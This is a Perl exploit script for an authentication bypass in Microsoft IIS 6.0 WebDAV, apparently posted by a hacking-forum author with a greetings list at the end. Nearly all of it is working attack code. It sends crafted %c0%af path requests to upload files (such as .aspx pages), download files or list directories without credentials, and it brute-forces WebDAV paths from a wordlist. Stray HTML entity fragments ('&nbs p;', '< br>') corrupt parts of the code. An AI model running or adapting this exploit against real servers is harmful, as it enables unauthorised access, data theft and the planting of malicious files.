======================================
MS IIS 6.0 WebDAV Auth. Bypass Exploit
======================================
# Author : FoX HaCkEr
#Contact : MKQ@HoTmAiL.CoM
# SiTe : www.sec4ever.com
======================================================================================================
#!/usr/bin/perl
# ********* !!! WARNING !!! *********
# * FOR SECURITY TESTiNG ONLY! *
# ***********************************
# MS IIS 6.0 WebDAV Auth. Bypass Exploit v1.1
# v1.1 add brute force dir fuction.
# v1.0 download?upload and list dir.
#
# Usage:
# IIS6_webdav.pl -target -port -method -webdavpath|-BruteForcePath [-file]
# -target &nbs p; eg.: 192.168.1.1
# -port eg.: 80
# -method eg.: g
# (p:PUT,g:GET,l:LIST)
# -webdavpath eg.: webdav
# -BruteForcePath eg.: brute force webdav path
# -file (optional) eg.: test.aspx
# Example:
# put a file:
# IIS6_webdav.pl -t 192.168.1.1 -p 80 -m p -x webdav -f test.aspx
# get a file:
# IIS6_webdav.pl -t 192.168.1.1 -p 80 -m g -x webdav -f test.aspx
# list dir:
# IIS6_webdav.pl -t 192.168.1.1 -p 80 -m l -x webdav
# brute force + list dir:
# IIS6_webdav.pl -t 192.168.1.1 -p 80 -m l -b dirdic.txt
# brute force + get file:
# IIS6_webdav.pl -t 192.168.1.1 -p 80 -m g -b dirdic.txt -f test.aspx
use IO::Socket;use Getopt::Long;
use threads;
use threads::shared;
# Globals Go Here.
my $target; # Host being probed.
my $port; # Webserver port.
my $method; # HTTP Method, PUT GET or .
my $xpath; # WebDAV path on Webserver.
my $bpath; # Bruteforce WebDAV path.
my $file; # file name.
my $httpmethod;
my $Host_Header; # The Host header has to be changed
GetOptions(
"target=s" ; => \$target,
"port=i" => \$port,
"method=s" => \$method,
"xpath=s" => \$xpath,
"bpath=s" => \$bpath,
"file=s" => \$file,
"help|?" => sub {
hello();
exit(0);
}
);
$error .= "Error: You must specify a target host\n" if ((!$target));
$error .= "Error: You must specify a target port\n" if ((!$port));
$error .= "Error: You must specify a put,get or list method\n" if ((!$method));
$error .= "Error: You must specify a webdav path\n" if ((!$xpath) && (!$bpath));
$error .= "Error: You must specify a upload or download file name\n" if ((!$file) && $method != "l");
if ($error) {
print "Try $0 -help or -?' for more information.\n$error\n" ;
exit;
}
hello();
if ($method eq "p") {
$httpmethod = "PUT";
} elsif ($method eq "g") {
$httpmethod = "GET";
} elsif ($method eq "l") {
$httpmethod = "PROPFIND";
} else {
print "$method Method not accept !!!\n";
exit(0);
}
# ************************************
# * We testing WebDAV methods first *
# ************************************
webdavtest($target,$port);
#end of WebDAV testing.
# ****************************************
# * We try to brute forceing WebDAV path *
# ****************************************
if ($bpath) {
$xpath = webdavbf($target,$port,$bpath);
}
#end of brute force
print "-" x 60 ."\n";
if ($httpmethod eq "PUT") {
my $content;
my $data;
#cacl file size
$filesize = -s $file;
print "$file size is $filesize bytes\n";
open(INFO, $file) || die("Could not open file!");
#@lines=<INFO>;
binmode(INFO); #binary
while( read(INFO, $data, $filesize))
{
$content .= $data;
}
close(INFO);
#print $content;
$Host_Header = "Translate: f\r\nHost: $target\r\nContent-Length: $filesize\r\n";
} elsif ($httpmethod eq "GET") {
$Host_Header = "Translate: f\r\nHost: $target\r\nConnection: close\r\n\r\n";
} elsif ($httpmethod eq "PROPFIND") {
$Host_Header = "Host: $target\r\nConnection: close\r\nContent-Type: text/xml; charset=\"utf-8\"\r\nContent-Length: 0\r\n\r\n";
$Host_Header = $Host_Header."<?xml version=\"1.0\" encoding=\"utf-8\"?><D:propfind xmlns:D=\"DAV:\"><D:prop xmlns:R=\"http://apache.org/dav/props/\"><R:bigbox/><R:author/><R:DingALing/><R:Random/></D:prop></D:propfind>";
}
print "-" x 60 ."\n$httpmethod $file , Please wait ...\n"."-" x 60 ."\n";
# ******************** ****
# * Sending HTTP request *
# ************************
if ($httpmethod eq "PUT") {
@results=sendraw2("$httpmethod /%c0%af$xpath/$file HTTP/1.0\r\n$Host_Header\r\n$content",$target,$port,10);
if ($#results < 1){die "10s timeout to $target on port $port\n";}
} elsif ($httpmethod eq "GET") {
@results=sendraw2("$httpmethod /%c0%af$xpath/$file HTTP/1.0\r\n$Host_Header",$target,$port,10);
if ($#results < 1){die "10s timeout to $target on port $port\n";}
} elsif ($httpmethod eq "PROPFIND") {
@results=sendraw2("$httpmethod /%c0%af$xpath/ HTTP/1.0\r\n$Host_Header",$target,$port,10);
if ($#results < 1){die "10s timeout to $target on port $port\n";}
}
#print @results;
$flag="off";
if ($results[0] =~ m|^HTTP/1\.[01] 2[0-9][0-9] |){
$flag="on";
} elsif ($results[0] =~ m|^HTTP/1\.[01] 4[0-9][0-9] |){
$flag="off";
}&nb sp;
print "-" x 60 ."\n";
if ($flag eq "on") {
if ($httpmethod eq "PUT") {
print "$httpmethod $file from [$target:$port/$xpath] OK\r\n";
} elsif ($httpmethod eq "GET") {
my $line_no = 0;
my $counter = @results;
foreach $line (@results){
++$line_no;
if ($line =~ /^Accept-Ranges: bytes\r\n/){
last;
}
}
# Write file to disk
open(OUTFILE, ">$file") or die "Could not write to file: $!\n";
binmode (OUTFILE);
print OUTFILE @results[$line_no+1..$counter];
close(OUTFILE);
print "$httpmethod $file from [$target:$port/$xpath] OK\r\nPlease check $file on local disk\r\n";
} elsif ($httpmethod eq "PROPFIND") {
print "$httpmethod path list from [$target:$port/$xpath] OK\r\n";
foreach $line (@results){
if ($line =~ /^\<\?xml version\=/i){
my @list = split("<a:href>", $line);
foreach $path (@list) {
$no = index($path,"<");
$result.=substr($path, 0, $no)."\n";
}
print $result;
; last;
}
}
}
} else {
print "$httpmethod $file from [$target:$port/$xpath] FAILED!!!\r\n";
}
print "-" x 60 ."\n";
exit(0);
# *************
# * Sendraw-2 *
# *************
sub sendraw2 {
my ($pstr,$realip,$realport,$timeout)=@_;
my $target2 = inet_aton($realip);
my $flagexit=0;
$SIG{ALRM}=\&ermm;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems");
alarm($timeout);
if (connect(S,pack "SnA4x8",2,$realport,$target2)){
alarm(0);
my @in;
select(S); $|=1;
print $pstr;
alarm($timeout);
while(<S>){
if ($flagexit == 1){
close (S);
print STDOUT "Timeout\n";
return "Timeout";
}
push @in, $_;
}
alarm(0);
select(STDOUT);
close(S);
return @in;
} else {return "0";}
}
sub ermm{
$flagexit=1;
close (S);
}
sub webdavtest {
my ($testip,$testport)=@_;
print "-" x 60 ."\n";
print "Testing WebDAV methods [$testip $testport]\n";
print "-" x 60 ."\n";
@results=sendraw2("OPTIONS / HTTP/1.0\r\n\r\n",$testip,$testport,10);
if ($#results < 1){die "10s timeout to $target on port $testport\n";}
#print @results;
$flag="off";
foreach $line (@results){
if ($line =~ /^Server: /){
($left,$right)=split(/\:/,$line);
$right =~ s/ //g;
print "$target : Server type is : $right";
if ($right !~ /Microsoft-IIS/i){
print "$target : Not a Microsoft IIS Server\n";
exit(0);
}
}
if ($line =~ /^DAV: /){
$flag="on";
}
if ($line =~ /^Public: / && $flag eq "on"){
($left,$right)=split(/\:/,$line);
&n bsp; $right =~ s/ //g;
print "$target : Method type is : $right";
if ($right !~ /$httpmethod/i){
print "$target : Not allow $httpmethod on this WebDAV Server\n";
exit(0);
} else {
$flag="on";
}
}
}
if ($flag eq "off") {
print "$target : WebDAV disable\n";
exit(0);
}
}
sub webdavbf {
my ($bfip,$bfport,$bfpath)=@_;
print "-" x 60 ."\n";
print "Try to brute forceing WebDAV path ...\n";
print "-" x 60 ."\n";
& nbsp; open(BF, $bfpath) || die("Could not open file!");
foreach $lines (<BF>){
chomp($lines);
$Host_Header = "Host: $bfip\r\nConnection: close\r\nContent-Type: text/xml; charset=\"utf-8\"\r\nContent-Length: 0\r\n\r\n";
$Host_Header = $Host_Header."<?xml version=\"1.0\" encoding=\"utf-8\"?><D:propfind xmlns:D=\"DAV:\"><D:prop xmlns:R=\"http://apache.org/dav/props/\"><R:bigbox/><R:author/><R:DingALing/><R:Random/></D:prop></D:propfind>";
@results=sendraw2("PROPFIND /$lines/ HTTP/1.0\r\n$Host_Header",$bfip,$bfport,10);
if ($#results < 1){die "10s timeout to $bfip on port $bfport\n";}
print "[$lines]...$results[0]";
#maybe this response< br> #HTTP/1.1 207 Multi-Status
if ($results[0] =~ m|^HTTP/1\.[01] 401 |){
print "Find out path on [$lines]\n";
return $lines;
last;
}
}
close(BF) ;
print "Sorry... We can not find any more path... :(\n";
exit(0);
}
sub hello{
print "\n";
print "\t ##################################################\n";
print "\t # MS IIS 6.0 WebDAV Auth. Bypass Exploit V1.0 #\n";
print "\t # **************** !!! WARNING !!! **************#\n";
print "\t # **** FOR PRIV8 AND EDUCATIONAL USE ONLY! ****#\n";
print "\t # ***********************************************#\n";
print "\t # Written by csgcsg 090529 ; #\n";
print "\t ###################################################\n";
print "\n\t $0 -target -port -method -webdavpath [-file]\n";
print "\n\t -target\t\t eg.: 192.168.1.1\n";
print "\t -port\t\t\t eg.: 80\n";
print "\t -method (p:PUT, g:GET, l:LIST)\t eg.: g\n";
print "\t -webdavpath|-bruteForcePath\t\t eg.: webdav\n";
print "\t -file\t\t\t eg.: test.aspx\n\n";
print "\tUsage eg.: \n\t$0 -t 192.168.1.1 -p 80 -m p -x webdav -f test.aspx\n";
};
=======================================================================================================
Gr33ts: Mr.MoDaMeR & SILVER FoX & Z7FAN HaCkEr & Black Cobra & KinG oF CnTroL & MadjiX & Ma3sTr0-Dz
Lagripe-Dz & Shi6oN HaCkEr & ALL Members sec4ever & ALL MY Friend in MsN & ALL Members p0c team &